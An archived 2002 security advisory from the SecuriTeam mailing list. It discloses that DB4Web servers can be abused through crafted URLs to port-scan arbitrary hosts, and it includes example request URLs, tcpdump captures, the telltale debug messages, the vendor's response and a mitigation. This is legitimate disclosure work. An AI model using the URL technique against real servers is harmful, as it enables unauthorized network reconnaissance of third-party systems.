[NEWS] DB4Web (R) TCP Connects to Arbitrary IP and Port
From: support@securiteam.comDate: 09/22/02
- Previous message: support@securiteam.com: "[NT] Flaw in Internet Scanner Parsing Mechanism"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 22 Sep 2002 12:58:58 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
DB4Web (R) TCP Connects to Arbitrary IP and Port
------------------------------------------------------------------------
SUMMARY
DB4Web, Your Application Server for high performance and secure
Web-Applications with access to various data sources. The DB4Web (R)
application can be misused to send TCP SYN packets (initiate TCP
connections) to arbitrary IP Addresses and TCP Ports by sending special
HTTP requests.
DETAILS
Vulnerable systems:
* DB4Web (R) Application Server
A DB4Web (R) server accessed with a web browser usually requests local or
remote databases to generate dynamic html pages. By requesting malicious
URLs, one can manipulate the server to query an arbitrary IP with a freely
definable port. The application will send TCP SYN packets to establish a
connection. The error messages of successful and unsuccessful TCP
connections are different. Thus, it is possible to portscan/fingerprint
IPs accessible for the DB4Web (R) server.
Example:
The scenario was tested with a system running SuSE Linux 7.3 that includes
a trial version of DB4Web (R) and a Linux system running tcpdump.
On the DB4Web (R) server (172.31.93.158) the URL
http://127.0.0.1/DB4Web/172.31.93.30:22/foo
Is requested by Mozilla (Web browser). 172.31.93.30 is the IP of the
system running tcpdump with port 22 open (SSHd). Tcpdump reports the 3-way
handshake and the reset due to wrong protocol used by the server (the
listener runs SSHd on port 22).
Tcpdump's output looks:
17:25:13.671550 172.31.93.158.1449 > 172.31.93.30.22: S
266670866:266670866(0) win 5840 <mss 1460,sackOK,timestamp 1232639
0,nop,wscale 0> (DF)
17:25:13.671663 172.31.93.30.22 > 172.31.93.158.1449: S
279647520:279647520(0) ack 266670867 win 5792 <mss 1460,sackOK,timestamp
11683562 1232639,nop,wscale 0> (DF)
17:25:13.674917 172.31.93.158.1449 > 172.31.93.30.22: . ack 1 win 5840
<nop,nop,timestamp 1232639 11683562> (DF) 17:25:13.678327 172.31.93.30.22
> 172.31.93.158.1449: P 1:23(22) ack 1 win 5792 <nop,nop,timestamp
11683563 1232639> (DF)
17:25:13.680997 172.31.93.158.1449 > 172.31.93.30.22: . ack 23 win 5840
<nop,nop,timestamp 1232640 11683563> (DF)
17:25:13.684046 172.31.93.158.1449 > 172.31.93.30.22: P 1:961(960) ack 23
win 5840 <nop,nop,timestamp 1232640 11683563> (DF)
17:25:13.686428 172.31.93.30.22 > 172.31.93.158.1449: . ack 961 win 8640
<nop,nop,timestamp 11683564 1232640> (DF)
17:25:13.688520 172.31.93.30.22 > 172.31.93.158.1449: P 23:42(19) ack 961
win 8640 <nop,nop,timestamp 11683564 1232640> (DF)
17:25:13.690469 172.31.93.30.22 > 172.31.93.158.1449: R 42:42(0) ack 961
win 8640 <nop,nop,timestamp 11683564 1232640> (DF)
The browser shows a lot of debug stuff reported by DB4Web (R), especially
the line:
connect() ok
And a few lines later:
callmethodbinary_2 failed
An URL like
http://127.0.0.1/DB4Web/172.31.93.30:555/foo
Requests TCP port 555 that is closed on the listening system.
Tcpdump reports three connection attempts:
17:38:59.965559 172.31.93.158.1451 > 172.31.93.30.555: S
1127433463:1127433463(0) win 5840 <mss 1460,sackOK,timestamp 1314829
0,nop,wscale 0> (DF)
17:38:59.965654 172.31.93.30.555 > 172.31.93.158.1451: R 0:0(0) ack
1127433464 win 0 (DF)
17:39:00.991971 172.31.93.158.1452 > 172.31.93.30.555: S
1127433466:1127433466(0) win 5840 <mss 1460,sackOK,timestamp 1314930
0,nop,wscale 0> (DF)
17:39:00.992066 172.31.93.30.555 > 172.31.93.158.1452: R 0:0(0) ack
1127433467 win 0 (DF)
17:39:02.012012 172.31.93.158.1453 > 172.31.93.30.555: S
1127433469:1127433469(0) win 5840 <mss 1460,sackOK,timestamp 1315031
0,nop,wscale 0> (DF)
17:39:02.012107 172.31.93.30.555 > 172.31.93.158.1453: R 0:0(0) ack
1127433470 win 0 (DF)
The debug message is different now and contains:
connect() failed: Connection refused
Vendor Response:
The DB4Web teams do not classify this behavior as a security related bug.
They define the verbose debug messages as a feature useful for developers.
The DB4Web teams states, that it is the customer's responsibility to
substitute the debug page with a custom error page.
Solution:
Replace the debug page with a non-verbose error page.
Vendor Communication:
08/29/02 Initial Notification via email to support@db4web.de, cc:
Juergen.Kettlitz@siemens.com
08/30/02 Got vendor receipt via phone
09/02/02 Phone call by vendor regarding details
09/09/02 Second email to vendor asking for patch status information
09/16/02 Phone call and email from vendor, No classification as security
flaw
ADDITIONAL INFORMATION
The information has been provided by
<mailto:stefan.bagdohn@guardeonic.com> Stefan Bagdohn.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Flaw in Internet Scanner Parsing Mechanism"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
